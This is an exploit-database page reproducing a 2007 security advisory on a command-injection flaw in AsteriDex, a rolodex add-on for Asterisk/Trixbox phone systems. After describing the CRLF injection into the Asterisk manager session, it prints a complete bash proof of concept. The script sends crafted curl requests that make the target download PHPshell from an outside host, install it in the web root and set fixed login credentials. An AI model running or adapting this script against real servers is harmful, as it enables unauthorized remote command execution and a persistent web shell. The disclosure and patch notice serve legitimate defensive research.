Exploitalert - Database of Exploits

AsteriDex (Asterisk / Trixbox) remote code execution

CVE	Category	Price	Severity
CVE-2009-3720	CWE-20	$5000	High

Author	Risk	Exploitation Type	Date
Ismael Olea	High	Remote	2007-07-17

CPE
cpe:cpe:/a:asterisk:a/asteridex

CVSS	EPSS	EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H	0.522936	0.80253

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	None	PR	The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

http://cxsecurity.com/ascii/WLB-2007070018

________________________________________________________________________ _______ Hoku Security Vulnerability Advisory ________________________________________________________________________ _______ Title: AsteriDex remote command execution Vendor URL: http://bestof.nerdvittles.com/applications/asteridex/ Type: Command injection / remote code execution Vulnerable versions: <= 3.0 Risk factor: High Popularity: Low Author: Carl Livitt Contact: carl (at) hoku.co (dot) uk [email concealed] Date: 25th June, 2007 Location: http://www.hoku.co.uk/advisories/asteridex.txt ________________________________________________________________________ _______ Description: AsteriDex is a digital rolodex for Asterisk / Trixbox PBXs. There is a command injection vulnerability which allows unauthenticated users to execute arbitrary commands on the Asterisk management console. Such access permits execution of arbitrary operating system commands as the 'asterisk' user. The software is vulnerable in its default configuration. ________________________________________________________________________ _______ Details: The script 'callboth.php' is used by AsteriDex to bridge a VOIP call between two end-points. Insufficient parameter checking is done on the variables IN and OUT, allowing a malicious user to inject arbitrary commands into the Asterisk management console. The script works by logging into the console server on port 5038/TCP on localhost. It then issues an 'Action: Originate' command which is used to setup the bridged call. The relevant code from callboth.php is: fputs ($fp, "Action: loginrn"); fputs ($fp, "Username: phpagirn"); fputs ($fp, "Secret: phpagirn"); fputs ($fp, "Events: offrnrn"); sleep(1) ; fputs ($fp, "Action: Originatern"); fputs ($fp, "Channel: $INrn"); << Command injection fputs ($fp, "Context: custom-callbothrn"); fputs ($fp, "Exten: $OUTrn"); << Command injection fputs ($fp, "Priority: 1rnrn"); $IN is set from $_GET['IN'] with no sanity checking other than a test of string length; all strings passed to $IN must be less than 100 chars, including the string 'sip/' which is prepended to $IN prior to the length check. Given sane values of $IN=123, $out=321 and $CallerID=567, the session would look like this: Action: login Username: phpagi Secret: phpagi Events: off Action: Originate Channel: 123 Context: custom-callboth Exten: 321 Priority: 1 By including CRLF characters in $IN, an attacker can inject arbitrary commands into the data stream, hijacking the authenticated session to run commands of the attackers choice. Take, for example, a $IN string containing: 190 (at) example (dot) com [email concealed]rnApplication: SystemrnData: echo pwn3d > /tmp/hoku.txtrn This would transform the session into: Action: login Username: phpagi Secret: phpagi Events: off Action: Originate Channel: 190 (at) example (dot) com [email concealed] Application: System Data: echo pwn3d > /tmp/hoku.txt Context: custom-callboth Exten: 321 Priority: 1 This would use the call manager's 'System' functionality to execute user- supplied operating system commands, in this case writing the word "pwn3d" to a file called "/tmp/hoku.txt". The rest of the session would fail because the attacker has subverted the original 'Action', rendering the remaining commands meaningless to the manager. ________________________________________________________________________ ______ Updated Versions: A patched version of AsteriDex is available from: http://bestof.nerdvittles.com/applications/asteridex/ ________________________________________________________________________ _______ Timeline: mm/dd/yyyy ---------- 06/25/2007 Vendor contacted. 06/03/2007 Vendor contacted again, response received. Details sent to vendor. 06/03/2007 Patch issued and updated version available. 06/05/2007 Advisory released. ________________________________________________________________________ _______ Hoku Security: Our aim is to give you the business assurance that you require in order to maintain a secure company infrastructure. With clients across the globe in the UK and USA, we understand the threats posed to your business and provide best of breed consulting and solutions to secure your interests and protect your bottom line. Visit http://www.hoku.co.uk for more information and contact details. ________________________________________________________________________ _______ Exploit: A proof of concept is provided. It downloads PHPshell, installs it into the root of the vulnerable Asterisk server's web directory and sets a username/password of trixbox/trixbox. It obeys the 100 char max restriction. ## ## Begin exploit ## #!/bin/bash echo Asteridex PoC Exploit (callboth.php vulnerability) echo By Carl Livitt / Hoku Security / June 2007 echo # This has to be (a) a valid SIP address, and (b) must answer when dialled. # The exploit will fail without these conditions being met. # Currently uses the Melonite SIP echo test service. SIP="190 (at) sip.melonite (dot) nu [email concealed]" # Magic number, don't change. The default installation of AsteriDex checks # for this number and fails without it. SEQ=654321 # Other stuff we need LOC=/asteridex/callboth.php OUT=123456 # Sanity if [ "$1X" == "X" ]; then echo Syntax: $0 <Host IP[:port]> echo For example: $0 www.example.com:8080 exit 1 fi # Insanity echo "[-] Exploiting host $1 - please wait" echo -n '[+]' Building shell script curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20!/bin/sh>/tmp/t%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20%2dn%20wget%20%2dO%20x.tar.bz2%20%5c%27http://%3e%3e/tm p/t%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20%2dn%20prdownloads.sf.net/phpshell/%3e%3e/tmp/t%0d%0a" &>/dev/null echo . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20phpshell%2d2.1.tar.bz2%3fdownload%5c%27%3e%3e/tmp/t%0d% 0a" &>/dev/null echo '[+] Executing shell script' curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20/tmp;chmod%20%2bx%20t;./t;tar%20jxf%20x.tar.bz2%0d%0a" &>/dev/null echo -n '[+] Setting up phpshell' curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20cd%20/tmp;mv%20phpshell-2.1%20p%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20/tmp/p;echo%20%5c%5busers%5c%5d>config.php%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20/tmp/p;echo%20%27trixbox%3d%22trixbox%22%27>>config.php%0 d%0a" &>/dev/null echo . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20mv%20/tmp/p%20/var/www/html/phpshell%0d%0a" &>/dev/null # Have a nice day echo "Done! You should now be able to browse to http://$1/phpshell/phpshell.php" echo You can login with the username 'trixbox' and password 'trixbox' ## ## End Exploit ##

Impressum